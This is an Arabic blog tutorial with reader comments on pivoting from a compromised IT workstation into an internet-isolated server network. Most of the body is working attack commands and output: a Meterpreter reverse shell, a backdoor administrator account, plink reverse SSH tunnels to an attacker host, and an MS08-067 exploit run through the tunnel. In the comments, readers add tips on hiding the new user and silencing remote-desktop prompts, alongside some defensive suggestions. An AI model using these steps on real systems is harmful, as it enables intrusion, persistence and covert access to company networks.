اختراق شبكة غير متصلة بالإنترنت عن طريق الـ SSH Tunnel

[toc]

 

كثيرا ما نتحدث عن الحماية مع أشخاص تقنيين ولا يشترط كل إنسان تقني أن يكون مهتم بالحماية حتى و إن كان مهندس أنظمة أو مهندس شبكات أو كلاهما.

فعندما نبدأ الحديث عن حماية الـ Enterprise خاصة نجد الجميع يٌطَمئن نفسه بأن شبكته معزولة عن الإنترنت و أن فريق العمل محمي خلف NAT و Firewall ويظن بهذا أنه يستطيع أن يستريح من عناء إنشاء تلك الشبكة الرائعة و الأمنة  (في نظره). موضوعنا اليوم هو إثبات خطأ هؤلاء و خطورة هذا التفكير على الشركات و خاصة المتوسطة و الكبيرة الحجم.

مقدمة

كما ذكرنا أنفا أن عزل الشبكات عن الإنترنت لا يعني أنها آمنة و أنه لن يستطيع أن يصل إليها أحد عبر الإنترنت.

سيكون بطل المهمة هو استعمال تقنية النفق عن طريق الـ SSH  أو SSH Tunnels . سنرى في هذا التكنيك كم هو رائع و خطير عند استخدامه لأغراض أخرى.

إليكم رسمة الشبكة التي سنخترقها اليوم.

شكل الشبكة الخارجي

أعتقد وضع هذه الشبكة  موجود  أو حتى ما يشاببه أو قريب منه جدا و بكثرة ,,

الشبكة 10.0.0.0/8: سنفترض أنها الإنترنت أو الشبكة الخرجية, و هي مكان الخطر المعروف

الشبكة 192.168.28.0/24: هي شبكة الموظفين في الشركة وهم قسم الـ IT و يستطيعون الوصول للإنترنت, لكنهم خلف Firewall/NAT

الشبكة 172.16.0.0/16: هي شبكة الخوادم وهي الشبكة المعزولة عن الإنترنت تماما.

جهاز موظف IT

جهاز أحد موظفين الـ IT: يمتلك كرتين شبكة و يستطيع الوصول إلى الإنترنت , يظهر ذلك من عملية الـ ping

Non Routable Machine

صورة من أحد السيرفرات: له كرت شبكة واحد متصل بالشبكة المعزولة عن الإنترنت

بداية المهمة ! , التسلل إلى الداخل

و بطريقة أو أخرى استطعنا أن نخترق جهاز أحد موظفين الـ IT (هنا تكمن قوة جمع المعلومات و الاستفادة منها و التلاعب بالهندسة الاجتماعية العكسية)

سنفترض أننا اخترقنا جهازه -والذي له اتصال بالانترنت-  بأي نوع من أنواع الاختراق و لنفترض أنه Client Side Attack عن طريقة ثغرة متصفح الـ IE و هي aurora و كان الـ payload هو meterpreter و استخدمنا منه الاتصال العكسي reverse_tcp.

شكل اختراق الضحية IT PC

ملاحظة: يفضل أن تقوم بنقل الـpayload إلى أي خدمة/عملية مضمونة لأن الضحية قد يغلق المتصفح و نخسر الاتصال به.

meterpreter > ps

Process list

============

PID Name Arch Session User Path

--- ---- ---- ------- ---- ----

0 [System Process]

4 System x86 0 NT AUTHORITY\SYSTEM

684 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe

792 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe

816 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe

868 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe

880 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe

1040 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

1112 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

1404 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1524 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

1684 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe

1832 explorer.exe x86 0 NOT_SECURE\vm-user C:\WINDOWS\Explorer.EXE

200 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe

440 VMwareTray.exe x86 0 NOT_SECURE\vm-user C:\Program Files\VMware\VMware Tools\VMwareTray.exe

448 VMwareUser.exe x86 0 NOT_SECURE\vm-user C:\Program Files\VMware\VMware Tools\VMwareUser.exe

492 afsloader.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ability FTP Server\afsloader.exe

532 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe

596 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe

676 VMwareService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMwareService.exe

756 afsmain.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ability FTP Server\afsmain.exe

1380 afsmain.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Ability FTP Server\afsmain.exe

1912 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe

3228 wscntfy.exe x86 0 NOT_SECURE\vm-user C:\WINDOWS\system32\wscntfy.exe

1252 rundll32.exe x86 0 NOT_SECURE\vm-user C:\WINDOWS\system32\rundll32.exe
meterpreter > migrate 1832

[*] Migrating to 1832...

[*] Migration completed successfully.

رائع,,

تأمين الطريق و مد الأنفاق!!

سنقوم الأن برفع ملف plink.exe إلى جهاز الضحية حيث Plink  هو البرنامج الذي سنستخدمه لإنشاء النفق بيننا وبين جهاز الـ IT

meterpreter > upload /media/ZONE/Security-Zone/Tools-Zone/plink.exe -> c:\\windows\
[*] uploading  : /media/ZONE/Security-Zone/Tools-Zone/plink.exe -> c:\windows\
[*] uploaded   : /media/ZONE/Security-Zone/Tools-Zone/plink.exe -> c:\windows\\plink.exe

ثم نقوم بالحصول على على shell / سطر الأوامر على جهاز الضحية
ملاحظة: أعتدت أن أنشئ مستخدم بصلاحيات المدير على أي جهاز أقوم باختراقه و هذه طريقة من عدة طرق أتبعها لضمان العودة بطريقة أو بأخرى.

C:\Documents and Settings\vm-user>net user KING sec4ar /add
net user KING sec4ar /add
The command completed successfully.

C:\Documents and Settings\vm-user>net localgroup administrators KING /add
net localgroup administrators KING /add
The command completed successfully.

C:\Documents and Settings\vm-user>

التعامل مع الأنفاق

حتى الأن لم أدخل في موضوعي!! ,,
إذن لنبدأ ..

قاعدة هامة: كل منفذ تريد أن تتصل به على جهاز الضحية  يجب أن تنشئ له نفق خاص و يكون موجه لذلك المنفذ

أولا أريد أن أحصل (مثلا) على Remote Desktop على جهاز الضحية عن طريقة إنشاء نفق لكي أستطيع تجاوز الـFirewall/NAT الذي بيني و بينه والذي يمنعني من عمل اتصال مباشر من جهازي إلى جهازه.. لا تنسى أن اتصالنا السابق كان اتصال عكسي.

الأن جاء دور البرنامج الذي رفعناه على جهاز الصحية “Plink” , سأكتب الأمر ثم أشرحه

plink -l root -pw 123123 -C -R 3389:127.0.0.1:3389 10.0.0.100

القاعدة من الأمر السابق هي:

plink -l LUSER -pw PASSWORD -C -R LPORT:127.0.0.1:RPORT  Attacking-Machine's_IP

حيث
plink: البرنامج الذي سيقوم بإنشاء النفق
-l : سندخل إسم المستخدم لجهازنا و في مثالنا كان الـ root
-pw: كلمة مرور المستخدم و في مثالنا 123123
-R: تعني Remote Tunnel

لنشرح تفاصيل الأمر من الرسمة التالية

NAT-Tunnel

1: هو العنوان الداخلي لجهاز الضحية, أي الـ Loopback
2: هو المنفذ الخاص بجهاز الضحية و الذي سنتصل به, و هنا نريد أن نتصل RDC إذن نستخدم البورت 3389.
3: هو المنفذ الخاص بجهازنا و أنا اخترت أن يكون 3389 و بالطبع تستطيع تغييره
4: هو عنوان جهازنا الخارجي الخارجي الـ public و بالطبع تعرفون كيف تعملون عملية الـ Port redirection من أجهزة الـ modem خاصتكم.

الناتج

C:\Documents and Settings\vm-user>plink -l root -pw 123123 -C -R 3389:127.0.0.1:3389 10.0.0.100
plink -l root -pw 123456 -C -R 3389:127.0.0.1:3389 10.0.0.100
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 09:38:a7:fc:d8:52:3b:c0:1c:11:df:1e:83:98:b1:db
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y

للتأكد من أن النفق تم إنشاءه بشكل صحيح, سنعرض الاتصالات الموجودة على جهازنا

netnetstat -nlpt
netstat -nlpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1051/rpcbind
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      1339/sshd
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      1151/cupsd
tcp        0      0 127.0.0.1:3389              0.0.0.0:*                   LISTEN      30480/7
tcp        0      0 0.0.0.0:37325               0.0.0.0:*                   LISTEN      1104/rpc.statd

لاحظ الاتصال المنصت

tcp 0 0 127.0.0.1:3389 0.0.0.0:* LISTEN 30480/7

رائع , تم إنشاء النفق بشكل صحيح ,,
الأن سنجرب الاتصال بجهاز الضحية عن طريق الـ Remote Desktop, على عنواننا الداخلي 172.0.0.1
تستطيع أن تستخدم أي برنامج (rdesktop , KRDC4), الأمر يعود إليك.

rdesktop 127.0.0.1 -g 800×600

RDC to NATed IT-Machine

الشكل الخارجي لما عملناه هو

شكل الوصول إلى سطح مكتب الضحية

تذكير: الخطوة السابق (الاتصال Remote Desktop): ليس شرطا فقد كانت لاختبار فعالية النفق. لكن الشرط هو إنشاء النفق نفسه لكي ننفذ بقية مهمتنا.

الزحف إلى العمق

الأن لنتعمق أكثر و هو محور موضعنا ,,

نريد أن نخترق جهاز في الشبكة التي لا تصل إلى الإنترنت أصلا(172.16.0.0/16), و التي يستطيع أن يصل إليها جهاز الضحية(192.168.28.128).
أي أننا سنحول كل البيانات المتجهة إلى الشبكة الداخلية الغير متصلة بالإنترنت عبر جهاز ضحيتنا

الأن نغلق الـremote Desktop
و نخرج من الـنفق

exit

ثم نخرج من سطر أوامر الضحية أي نخرج من الشيل

exit

سنعود الأن إلى سطرا أوامر الـ Meterpreter
الأن سننفذ الأمر الذي سيحول كل البيانات الصادرة من جهازنا إلى الجهاز الغير متصل بالأنترنت عبر جهاز ضحيتنا الأولى

meterpreter> execute -f "plink -l root -pw 123123  -R 445:172.16.0.7:445 10.0.0.100"
Process 3520 created.

Tunnel to Non-Routable Machine

الأمر هنا هو نفس فكرة الأمر السابق إلا أننا استبدلنا الـ localhost أو الـ 127.0.0.1 بـ عنوان الجهاز الأخر (172.16.0.7) و الذي لا يصل إلى الإنترنت

ملاحظة: إذا تبادر إلى ذهنك كيف عرفنا عنوان الجهاز الأخر , فأجيب و أقول تستطيع استبدال اتصالك بالـ Remote Desktop بـأن تقوم بعملية scan و هذا استغلال أخر لوجود النفق

للتأكد من أن النفق تم إنشاءه بشكل صحيح, سنعرض الاتصالات الموجودة على جهازنا

netstat -nlpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1051/rpcbind
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      1339/sshd
tcp        0      0 127.0.0.1:445               0.0.0.0:*                   LISTEN      1151/5
tcp        0      0 0.0.0.0:37325               0.0.0.0:*                   LISTEN      1104/rpc.statd

الأن سنقوم بعملية مسح على منافذ الجهاز 172.16.0.7 و التي تمر كل بيناتا إليه عن طريق الضحية الأولى”192.168.28.128″ فيها بسبب النفق الجديد و أصبح هو الـ loopback لجهازنا , سأبدأ بفحص خدمة الـ smb عليه.

nmap --script smb-check-vulns.nse 127.0.0.1 -p 445

Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-10 22:26 AST
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)

NSE Timing: About 0.00% done
NSE: Script Scanning completed.
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000088s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-check-vulns:
|   MS08-067: LIKELY VULNERABLE (host stopped responding)
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

Nmap done: 1 IP address (1 host up) scanned in 50.71 seconds

رائع ,, الخدمة تعمل عليه و المنفذ مفتوح و كما رأينا من عملية المسح أنه مصاب بالثغرة MS08-067

هيا لنطبق عليه هذه الثغرة, أيضا سنستخدم الـ Payload نوعه bind_tcp و سنجعل الـ RHOST هو الـ loopbak خاصتنا أي 127.0.0.1

لنرى هل سينجح في التطبيق أم لا,,

./msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/shell/bind_tcp LPORT=7777 RHOST=127.0.0.1 TARGET=3 E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Attempting to trigger the vulnerability...

رأينا أنه تم تنفيذ العملية بنجاح لكن ,, أين الـ shell الذي يطمح إليه أي مخترق ؟!؟

سنرى الأن ,,

لقد قمنا فعلا بالوصول و يفترض أن جهاز الضحية ينصت الأن إلى المنفذ 7777 . ما يجب عمله الأن هو إنشاء نفق جديد إلى جهاز الضحية الجديدة عبر الضحية الأولى ولكن المنفذ سيتغير من 445 إلى 7777 .

هيا بسرعة ,,

نذهب إلى الـ meterpreter المتصل بجهاز الضحية الأولى(192.168.28.128) و ننفذ التالي

execute -f "plink -l root -pw 123123  -R 7777:172.16.0.7:7777 10.0.0.100"

و كعادتنا سنتأكد من إنشاء النفق بشكل صحيح

netstat -nlpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1051/rpcbind
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      1339/sshd
tcp        0      0 127.0.0.1:445               0.0.0.0:*                   LISTEN      1151/5
tcp        0      0 127.0.0.1:7777 0.0.0.0:*                   LISTEN 2009/11
tcp        0      0 0.0.0.0:37325               0.0.0.0:*                   LISTEN      1104/rpc.statd
tcp        0      0 :::111                      :::*                        LISTEN      1051/rpcbind
tcp        0      0 :::22                       :::*                        LISTEN      1339/sshd
tcp        0      0 ::1:445                     :::*                        LISTEN      1151/5
tcp        0      0 ::1:7777                    :::*                        LISTEN      2009/11

كما ذكرنا أن الضحية الجديدة الأن تنصت على المنفذ 7777 على أحر من الجمر 😀

لنتصل بها الأن عن طريق الـ Netcat , طبعا الاتصال سيكون على 127.0.0.1 عبر النفق

nc -v 127.0.0.1 7777
Connection to 127.0.0.1 7777 port [tcp/cbt] succeeded!

و الشكل الخارجي لما عملناه سابقا لنصل إلى الشبكة الثانية

شكل اختراق الشبكة الثانية - الغير متصلة بالانترنت

حتى هنا ,, أكون قد أنهيت شرحي و رمضان كريم و نتمنى لكم اختراقا شهيا 😉

نبذة عن الكاتب

المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.

التعليقات:

اترك تعليقاً | عدد التعليقات: (27)

  1. يقول مصطفى:

    موضوع جميل أخ صبري , قد لا ألم بكافة جوانبه ( في الوقت الراهن)

    بالنسبة للأشكال الخارجية , عند توضيح الإتصالات , الDesired Connection , هي عكسية أليست كذلك ؟

    جزاك الله خير على وقتك وجهدك . وبارك بعلمك ,,,

    دمت بود ,,

  2. يقول صبري صالح:

    حياك الله أخوي مصطفى

    أخي الاتصال العكسي الوحيد في هذه المهمة هو الاتصال الأولى الذي الخترقنا به جهاز الـ IT لتسهيل الأمر اعتبر أنه صديقك أو أعطيته صفحة ملغومة بأي برنامج مثل (befrost,Skynet,etc) فالذي يحصل هو أن الجهاز هو الذي يتصل بكل لكي نهرب من الـ NAT أو الفايروول في البداية بعدها كل الاتصالات موجهة من جهازنا إلى أجهزة الضحايا.

    كنا قديما لا نحتاج إلى الاتصال العكسي لأن أغلب الناس تستخدم الاتصال بالهاتف Dialup و لم يكن الناس تستخدم جدران نارية و قليل جدا من عندهم DSL في المنزل أو حتى كنا لا نعرفه 😀

    لا تترد في طرح أي سؤال أخر و أنصحك أن تكبر الصور و تتمعن فيها جيدا لتساعدك الأسهم على فهم الموضوع

    بالمناسبة الموضوع قد يحتاج إلى قراءة أكثر من مرة للفهم وعدم فهمك للموضوع من أول مرة لا يعيب فيك نهائيا.

  3. يقول سامر مقدادي:

    أخ صبري ..
    موضوع مفيد و رائع .. وأنا اتفق معك …
    ال NAT هي فعليا ليست من وسائل الحماية .. هي أقرب إلى طريقة لإدارة الشبكة وعزلها..وسؤالي .. كيف يمكن تجنب هذه الطريقة ومنعها ؟
    بالنسبة لي أجد الحل:
    1- توعية الموظفين عن الهندسة الاجتماعية.
    2- تحديث الانظمة سواء الويندوز أو اليونكس أو حتى الانترنت اكسبلورر.
    3- إغلاق ال Services التي لا تحتاجها
    4- منع ال SSH عن طريق أيقاف اي اتصال SSH من الخارج إلى الداخل .. أو على الاقل تحديد IPs معينة فقط يمكنها الدخول عن طريق Port 22

  4. يقول صبري صالح:

    صدقت أخوي سامر ,, الـ NAT ليس للحماية ولم يبتكروه للحماية من الأساس بل لتوفير العناوين

    بالنسبة للنقاط التي تفضلت بها :
    (1- توعية الموظفين عن الهندسة الاجتماعية)
    مهمة جدا جدا جدا
    (2- تحديث الانظمة سواء الويندوز أو اليونكس أو حتى الانترنت اكسبلورر.
    3- إغلاق ال Services التي لا تحتاجها)
    عمل الـ Hardening لأي نظام موجود في الشبكة هو شئ أساسي و أتفق معك جدا.

    (4- منع ال SSH عن طريق أيقاف اي اتصال SSH من الخارج إلى الداخل .. أو على الاقل تحديد IPs معينة فقط يمكنها الدخول عن طريق Port 22)
    في هذه النقطة ,, لن تحل المشكلة لأنك قلت port22 فماذا لو كان الاتصال بـssh على منفذ مختلف؟
    أيضا في موضوعنا النفق يتم من جهاز الضحية إلى جهازنا يعني نفق من جهازه إلى جهازنا ولهذا احتجنا إلى كلمة مرور الرووت لجهازنا

    كثير من الناس تقوم بعمل DROP للـ Input و للـ Froward و تترك الـ output مفتوح.

    بصراحة أخوي الجدار الناري ليس دوما الحل قد يكون وجود الـ IPS شئ مهم ولكنه أيضا خطر لأنه قد يُستخدم لحجب الخدمة 🙁

    كما أتفقنا سويا , فكما أنا الاختراق لا يأتي بطريقة واحدة فإن الحماية لا تتم بطريقة واحدة

    ننتظر حلول من الإخوة
    شرفني مرورك
    تحياتي واحترامي

  5. يقول علي الشّمري:

    سلمت يداك أخي صبري على الموضوع والشرح التفصيلي … أعتقد بعد هذا الشرح لن يجد أحد صعوبة في إنشاء نفق والتعامل معه، لانك ذكرت 3 أمثلة مختلفة تقريباً …

    ألف شكر يا بطل، ورمضان مبارك عليك وعلى الجميع إن شاء الله …

  6. يقول علي الشّمري:

    للتو رأيت نقاشكم “صبري وسامر” وأحب أضيف بإنه حتى ولو قمت بإستعمال جدار ناري مغلق المخارج OUTPUT = DROP فلو وجد منفذ واحد فقط فيه مفتوح يمكن إستغلاله وسبق وشرحت أنا هذا في أحد المواضيع تجدونا يمكن في هذين الموضوعين:
    http://www.binary-zone.com/2009/01/27/bypass-company-firewall-using-http-tunnels/
    http://www.binary-zone.com/2008/09/30/bypass-isp-blocked-ports/

    أي مخترق سيحتاج الى منفذ واحد فقط ليخرج منه وهذا يكفي ليمرر جميع بياناته من خلال ذلك المنفذ … صراحة الحلول هنا أتوقع محصورة في أنظمة تحليل الحزم ولا أقصد هنا Packet Filtering بل أقصد إستعمال نظام أو جهاز لديه قابلة عمل Packet Inspection … طبعاً مع وجود نظام IPS يقوم بإتخاذ اللازم بشكل سريع ويوقف أي تلاعب يراه على الخط …

    ننتظر أفكار أخرى 🙂

  7. يقول MrRo0oT:

    رااائع …

  8. يقول Try to be IT:

    اخي العزيز ,,,,

    شكرا علي الشرح الجد رائع.

    و لكن عندي سؤال بالنسبة للامر plink او بمعني اصح الاداءة plink
    حاولت ان اجربها طبعا استعمل سيناريو شبيه بالدي عملته:

    عملت اتصال عكسي باستخدام الاداة netcat و نفدت plink انظر الي النتائج:

    plink -l root -pw awardsw -C -R 3389:127.0.0.1:3389 192.168.0.225
    plink -l root -pw awardsw -C -R 3389:127.0.0.1:3389 192.168.0.225
    FATAL ERROR: Network error: Connection refused

    ارجوا الايضاح طبعا جهاز الضحية ويندوز اكس بي و المهاجم backtrack 4

  9. يقول Try to be IT:

    السلام عليكم ,,,
    بعد عدة محاولات و تغيير الخطة باستخدام جهازين ويندوز اكس بي (الضحية و المهاجم).

    وعند طلب الريموت ديسكتوب للايبي 127.0.0.1 يفتح عندي جهاز المهاجم (win XP ) ؟؟؟؟!!!!!

  10. يقول صبري صالح:

    عليكم السلام ورحمة الله,,

    أعتقد أن سبب المشكلة الأولى
    FATAL ERROR: Network error: Connection refused

    هو أن هناك اتصال موجود على الـ remote Desktop على جهاز الضحية. لهذا لن تسمح لك الخدمه باستخدامها مرتين (هذا في الـ XP,Vista,Win7) أم في السيرفرات ممكن يأتي بحد أقصى اتصالين في آن واحد و تستطيع التلاعب في هذا الأمر و تزود عندد الاتصالات.

    أنا لم أجرب الموضوع عندما يكون جهاز المهاجم Windows بصراحة كل تجارب الاختراق أستخدم فيها Linux في شرحي للموضوع كان جهاز المخترق Fedora 12 و جهاز الضحية كان XPsp2

    أيضا لا تنسى أن تفعل خدم الـ Remote Desktop على جهاز الضحية

    سأحاول أن أكون معاك حتى تحل مشكلتك

  11. يقول Try to be IT:

    مشكور اخي علي بادرتك الطيبة في مساعدتي.

    1- اريد ان اوضح ان المشكلة الاولي كان حلها بعمل SSH Server عند جهاز المهاجم لهذا السبب نتج هذا الخطاء:
    FATAL ERROR: Network error: Connection refused
    2- المشكلة الثانية انه جهاز الضحية WinXP و المهاجم WinServer2003 طبعا نزلت فيه OpenSSH وكل شئ تمام لكن عند طلب Remote DeskTop علي LoopBack يفتح عندي WinServer2003 ما يفتح جهاز الضحية معي (WinXP) ارجوا ان تكون الامور واضحة لديك.

  12. […] This post was mentioned on Twitter by Abdurrahman Alblowi, Security 4 Arabs. Security 4 Arabs said: اختراق شبكة غير متصلة بالإنترنت عن طريق الـ SSH Tunnel http://bit.ly/9HJECt […]

  13. يقول صبري صالح:

    بارك الله فيك أخي,,

    حسنا ما رأيك أن نغير منفذ الـ RDP لجهاز المُخترق ؟!
    http://support.microsoft.com/kb/306759
    رابط أخر
    http://www.onlinehowto.net/Tutorials/Windows-XP/Change-Windows-remote-desktop-port-number/291

    • يقول Try to be IT:

      الصراحة فكرة عبقرية جدأأأأأأأأأأأأأأأأأ

      لانه الامور مشيت تمام غيرت المنفذ من 3389 الي 3388 و عملت في الريموت :
      127.0.0.1:3388
      تحصلت علي ويندوز اكس بي.

      بارك الله فيك ياخوي وانشاء الله ربي يزيدك علماً….

      سلااااااااااااااام…

  14. يقول Try to be IT:

    خلاصة الموضوع :
    1- عندما يكون جهاز المهاجم باك تراك و الضحية و يندوز الامور تمشي تمام.
    2- عندما يكون كل من المهاجم و الضحية ويندوز يجب تغيير منفذ الريموت عند الضحية.

    ولكن عندي شؤال :
    1-كيف ممكن تغيير منفذ الريموت دسكتوب من جهاز المهاجم؟
    2-كيف من الممكن انه يتم عمل الريموت من غير ان يلاحظ الضحية بمعني اخر عدم ظهور الرسالة تخبره بان هناك المستخدم xxxx يريد عمل ريموت؟

  15. يقول صبري صالح:

    الحمدلله , بعد ما فهمت مشكلتك تأكدت أنه سيكون الحل ,, لأني لا أستخدم إلا في أقل القليل على مستوى تعاملي كله.

    1-كيف ممكن تغيير منفذ الريموت ديسك توب من جهاز المهاجم؟

    من الـ Registry لكن المشكلة لو غيرته فلن يستطيع هو الدخول على النظام بالـ Remote لأنه لا يعرف البورت 😀

    2-كيف من الممكن انه يتم عمل الريموت من غير ان يلاحظ الضحية بمعني اخر عدم ظهور الرسالة تخبره بان هناك المستخدم xxxx يريد عمل ريموت؟

    لو كان على windows server فلن يحصل هذا معه لأن بشكل افتراضي يسمح بواحد على الجهاز الفيزيائي و إثنين عن طريق الـ Remote Desktop

    كانت هناك طريقة أعملها قديما على XP أزود عدد الـ Remote Desktop Sessions لكن نسيتها لأنها من عمر طويل لكن ابحث عنها ستجدها هي كانت الفكرة بتغيير ملف معين و استبداله بملف windows Server

    تحياتي و احترامي

  16. يقول Try to be IT:

    السلام عليكم …

    اخوي كلامك صحيح 100% بس ممكن اني اغير منفذ الريموت و بعد ما اخلص شغل ارجعها ثاني.

    سلااااااااااااام

  17. يقول البرنس:

    اخي الكريم صبري …

    اريد منك المشورة اذا سمحت ماهي افضل البرامج المستخدمة في هذه العملية والمتطورة في هذه الفترة لكي اصل لنتيجة رائعة وسهله …؟

    أشكرك على كل الأحوال

  18. يقول صبري صالح:

    أخوي البرنس بصراحة ما فهمت سؤالك

    سامحني ياخوي و أعد صياغة السؤال لو سمحتلي

  19. يقول yoosefmansoor:

    عندنا فى العمل اجهزة كثيرة مربوطة بنظام الدومين ولا نستطيع تغيير اى اعداد من اعدادات الجهاز الا بعد الرجوع للادارة فى القاهرة وتقوم الادارة بالدخول على الاجهزة من خلال ال IP والسؤال هو هل يمكننا تغيير اى اعداد من الاعدادات مثل تغيير الطابعة او اللغة او ربط جهزى بطابعة اخرى فى حالة نعطل الطابعة المربوط بها جهازى

  20. يقول ali_m:

    يا إلهي !!!! كلما تعمقت بالمدونة أحسست أني أكثر جهلا بالشبكات 🙁
    وعندي مليون سؤال لكن سأكتفي بالبعض 😀
    1-في مؤسستي كل جهاز IT له العنوان
    10.x.x.x
    و للاتصال بالسيرفرات (العمل على تطبيقات ويب) يستلزم استخدام برنامج
    cisco vpn client لانشاء اتصال (لأغراض آمنية على ما أعتقد ؟؟ ) بعدها يتم اسناد IP مثل 192.168.1.1
    لجهاز ال IT حتى يتمكن من الوصول ل (web app) …. ماسبب استخدام اتصال الشبكة الافتراضية ؟؟؟ لو اخترقت جهاز IT آخر ماهو ال IP الذي علي أن أعتمد عليه ؟ ؟ علما أن الشبكة هي من نوع WAN وكل مجموعة أجهزة أو سيرفرات خلف راوتر
    أتمنى منك كونك خبير شبكات أن تقدم لي شرحا بسيطا عن بنية هذه الشبكة
    2-أنا متصل بالانترنت , كيف لي أن أعرف اذا كان IP جهازي Real ?? علما أن الاتصال عن طريق شبكة 3g
    3-بالنسبة لبرنامج SSH Tunnels لو كان هناك منفذ مفتوح بالجهاز الهدف هل يمكن استعماله بدلا من فتح منفذ جديد تجنبا لمشاكل الجدار الناري مثلا ؟؟!!
    4-أنا استخدم Vmware لأغراض تجريب الاختراقات و تقليد الشبكات لكني وجدته غير مجدي في مثل هكذا حالة (اجهزة خلف راوترين على الأقل) فما البرنامج الأمثل لتقليد الشبكات
    5-عذرا على الاطالة واعذرني على جهلي وتقبل خالص احترامي وتقديري

  21. يقول ali_m:

    بالنسبة للأخ try to be IT
    سؤالك عن
    -كيف من الممكن انه يتم عمل الريموت من غير ان يلاحظ الضحية بمعني اخر عدم ظهور الرسالة تخبره بان هناك المستخدم xxxx يريد عمل ريموت؟
    اليك الجواب على الصفحة التالية بأكثر من طريقة
    http://fawzi.wordpress.com/2008/02/09/enabling-multiple-remote-desktop-sessions-in-windows-xp/
    وهي ببساطة كما ذكر المهندس صبري باستبدال ملف termsrv.dll بآخر
    واليك أداة لم اجربها بنفسي تقوم بعمل الاستبدال آليا
    http://www.kood.org/files/Termiserv_XPSP2-SP3_i386_2.1.exe

    وبالمرة أنصحك باخفاء اسم اليوزر الجديد الذي أنشأته كي لايظهر بشاشة تسجيل الدخول
    من regedit > specialaccounts
    انشئ قيمة Dword باسم المستخدم الجديد وضع قيمتها 1
    سلام

  22. يقول troy0x:

    لو كانت الشبكة تستخدم اجهزة تشفير مثل ال ASA او ال PIX هل يمكن عمل هذه الطريقه معها ؟؟؟

  23. يقول mohanad:

    مهندسنا العزيز صبري انا اريد منك توضح بسيط اعرف انه سخيف ولكن ارحم جهلي 🙂 لو سمحت وضح لي هل انت بالبدايه ارسلت رابط ملغوم للضحيه واصبحت تدخل للجهاز منه؟؟ وهل الجهاز الذي اخترقت به هل عن طريق الباك تراك ام ماذا ؟؟؟ ارجوك ان تجيب عالاسئله وان تعيد بشكل مبسط جدا وسريع عن كل خطوه وخاصه مرحلة ال plink ارجو الرد يا مهندسنا الرائع

  24. يقول Binsaad:

    السلام عليكم
    ما شاء الله مدونه اكثر من رائع و متعوب عليها
    و انا مبتدى فالشبكات و ان شاء الله استفيد من المدونه و اخرج محترف

    تشكر اخي الكريم
    و يعطيك العافية

أكتب تعليق